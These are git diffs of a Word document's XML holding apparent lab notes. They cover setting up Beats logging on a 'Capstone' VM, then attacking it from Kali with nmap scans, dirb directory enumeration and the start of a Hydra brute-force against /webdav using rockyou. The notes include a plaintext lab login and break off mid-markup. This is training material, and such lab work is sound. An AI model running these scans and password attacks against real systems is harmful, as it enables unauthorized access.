--- a/Notes/Project2 Notes.docx
+++ b/Notes/Project2 Notes.docx
@@ -2,7 +2,232 @@
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
 <w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:body>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Setting up Beats on Capstone</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Subtitle"/>
+      </w:pPr>
+      <w:r>
+        <w:t>This is done for logging that attacks before attacking</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Log into capstone</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Vagrant:tnargav</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>su</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Filebeat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> modules enable apace</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Filebeat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> setup</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Metricbeat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> modules enable apache</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Metricbeat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> setup</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Packetbeat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> setup</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Systemctl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> restart </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>filebeat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Systemctl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> restart </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>metricbeat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Systemctl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> restart </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>packetbeat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+      </w:pPr>
+    </w:p>
     <w:sectPr>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
@@ -11,6 +236,127 @@
     </w:sectPr>
   </w:body>
 </w:document>
+</file>
+
+<file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
+  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="11355C92"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="37063518"/>
+    <w:lvl w:ilvl="0" w:tplc="04090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:num w:numId="1">
+    <w:abstractNumId w:val="0"/>
+  </w:num>
+</w:numbering>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
@@ -408,6 +754,28 @@
     <w:name w:val="Normal"/>
     <w:qFormat/>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="Heading2">
+    <w:name w:val="heading 2"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:link w:val="Heading2Char"/>
+    <w:uiPriority w:val="9"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="00FD141F"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="40"/>
+      <w:outlineLvl w:val="1"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
+      <w:sz w:val="26"/>
+      <w:szCs w:val="26"/>
+    </w:rPr>
+  </w:style>
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
@@ -434,6 +802,66 @@
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
+    <w:name w:val="Heading 2 Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Heading2"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="00FD141F"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
+      <w:sz w:val="26"/>
+      <w:szCs w:val="26"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Subtitle">
+    <w:name w:val="Subtitle"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:link w:val="SubtitleChar"/>
+    <w:uiPriority w:val="11"/>
+    <w:qFormat/>
+    <w:rsid w:val="00FD141F"/>
+    <w:pPr>
+      <w:numPr>
+        <w:ilvl w:val="1"/>
+      </w:numPr>
+      <w:spacing w:after="160"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+      <w:color w:val="5A5A5A" w:themeColor="text1" w:themeTint="A5"/>
+      <w:spacing w:val="15"/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="22"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="SubtitleChar">
+    <w:name w:val="Subtitle Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Subtitle"/>
+    <w:uiPriority w:val="11"/>
+    <w:rsid w:val="00FD141F"/>
+    <w:rPr>
+      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+      <w:color w:val="5A5A5A" w:themeColor="text1" w:themeTint="A5"/>
+      <w:spacing w:val="15"/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="22"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="ListParagraph">
+    <w:name w:val="List Paragraph"/>
+    <w:basedOn w:val="Normal"/>
+    <w:uiPriority w:val="34"/>
+    <w:qFormat/>
+    <w:rsid w:val="00FD141F"/>
+    <w:pPr>
+      <w:ind w:left="720"/>
+      <w:contextualSpacing/>
+    </w:pPr>
   </w:style>
 </w:styles>
 </file>

--- a/Notes/Project2 Notes.docx
+++ b/Notes/Project2 Notes.docx
@@ -221,10 +221,976 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Attacking capstone from kali</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Determine capstone </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="1"/>
-          <w:numId w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Run ifconfig on kali to determine subnet</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Kali IP | 192.168.1.90</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Run </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> against 192.168.1.1/24</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Nmap  192.168.1.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>0</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>/24</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Did not give enough information. Needed to run -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sV</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> to get more information</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Nmap -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sV</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 192.168.1.0/24</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>192.168.1.100</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Elastic Search | Ubuntu</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>192.168.1.105</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Apache | Ubuntu</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Open </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId5" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>http://192.168.1.105</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Run </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dirb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> against apache server</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Dirb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId6" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>http://192.168.1.105</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Returned</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="4"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>*/server-status</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="5"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Access </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Forbiden</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="4"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>*/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>webdav</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="5"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Username:Password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> login</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Run Hydra against */</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>webdav</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Find wordlists</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Locate </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>rockyou</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Cd /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/share/wordlists</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
